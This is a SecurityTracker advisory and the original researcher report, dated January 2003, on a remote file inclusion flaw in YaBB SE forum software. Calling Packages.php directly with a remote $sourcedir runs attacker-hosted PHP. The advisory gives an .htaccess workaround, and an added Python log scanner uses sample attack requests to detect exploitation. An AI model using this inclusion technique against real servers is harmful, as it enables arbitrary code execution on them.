Category:   Application (Forum/Board/Portal)  >   YaBB SE
Vendors:
YaBB SE Forum Include Bug Allows Remote Users to Execute Arbitrary Code on the Server
SecurityTracker Alert ID:  1005973
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 23 2003
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): prior to 1.5.0
Description:   A vulnerability was reported in the YaBB SE forum software. A remote user can execute arbitrary code on the target server.

It is reported that the 'Packages.php' file includes the 'Packer.php' script from the directory named by the '$sourcedir' variable. A remote user can create a URL that sets this variable to a remotely located server, causing the target server to include the remotely located 'Packer.php' file. A demonstration exploit URL that will cause the code contained in the 'Packer.php' file located on the 'http://[attacker]' server to be executed on the target server is provided:


The code will be executed with the privileges of the target web server.

The vendor has reportedly been notified.

Impact:   A remote user can execute arbitrary PHP code and shell commands on the target server with the privileges of the target web server.
Solution:   No vendor solution was available at the time of this entry.

The author of the report has indicated that, as a workaround, users of the Apache web server can create a '.htaccess' file in the '/Sources/' directory that contains a 'Deny from all' statement. This will reportedly prevent remote users from accessing the files in that directory to exploit this flaw.
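A log check for direct requests to scripts under '/Sources/', which also shows whether the '.htaccess' workaround answered them. This is an added example, not part of the original alert or report: the log lines are constructed, and Apache common log format and a 403 status for denied requests are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (Apache common log format); not from the report.
SAMPLE_LOG = """\
192.0.2.10 - - [23/Jan/2003:10:01:02 +0000] "GET /index.php?board=1 HTTP/1.0" 200 5120
192.0.2.44 - - [23/Jan/2003:10:02:11 +0000] "GET /Sources/Packages.php?sourcedir=http://host.example HTTP/1.0" 200 312
192.0.2.44 - - [23/Jan/2003:10:02:40 +0000] "GET /forum/Sources/Packages.php?sourcedir=http%3A%2F%2Fhost.example HTTP/1.0" 403 210
192.0.2.77 - - [23/Jan/2003:10:05:00 +0000] "GET /Sources/Packages.php HTTP/1.0" 403 210
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})\b')
SOURCES_RE = re.compile(r"/Sources/[^/]+\.php$", re.IGNORECASE)


def scan(log_text):
    """Return one finding per direct request to a script under /Sources/."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line we can parse
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        parts = urlsplit(target)
        # Files in /Sources/ are meant to be included, not requested directly.
        if not SOURCES_RE.search(unquote(parts.path)):
            continue
        # parse_qsl percent-decodes values, so encoded URLs are caught too.
        params = dict(parse_qsl(parts.query, keep_blank_values=True))
        remote = "://" in params.get("sourcedir", "")
        findings.append({
            "client": client,
            "kind": "remote-sourcedir" if remote else "direct-access",
            # 403 means the 'Deny from all' workaround answered the request.
            "blocked": status == 403,
        })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs record only the query string, so a 'direct-access' finding that was not blocked still deserves review: the variable could have been supplied in a POST body or cookie.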

Vendor URL:
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  YabbSE Remote Code Execution Vulnerability

YabbSE Remote Code Execution Vulnerability (By Mindwarper)

<------- ------->

Vendor Information:

Homepage :
Vendor : informed
Mailed advisory: 21/01/02
Vendor Response : None

Affected Versions:

All versions prior to 1.5.0


YabbSE keeps all of its function includes in a directory called "Sources" which
is not protected. Inside this directory a file called Packages.php exists. This
file is supposed to be included and not called directly, but if an attacker calls
it directly he/she may cause the script to run remote arbitrary code.
Below are a couple of the first lines in Packages.php:


global $adminplver;
$Packagesphpver="YaBB SE 1.4.1";

$safe_mode = ini_get("safe_mode");
$pacmanver = "1.4.1";




We can see here that the variable $sourcedir is never defined and therefore may be
defined through global injection.


where the attacker server has a file called Packer.php.
An attacker may execute remote code on the server with webserver permissions.

Side-note: An attacker may also use this file for XSS attack on the server.


Please check the vendor's website for new patches.

As a temporary solution, create a .htaccess file that contains 'Deny from all'.
Place it in the /Sources/ directory and that should block remote users from accessing it.


Hawkje, Truckle, Cyon, daemorhedron, Mithrandir

<------- ------->
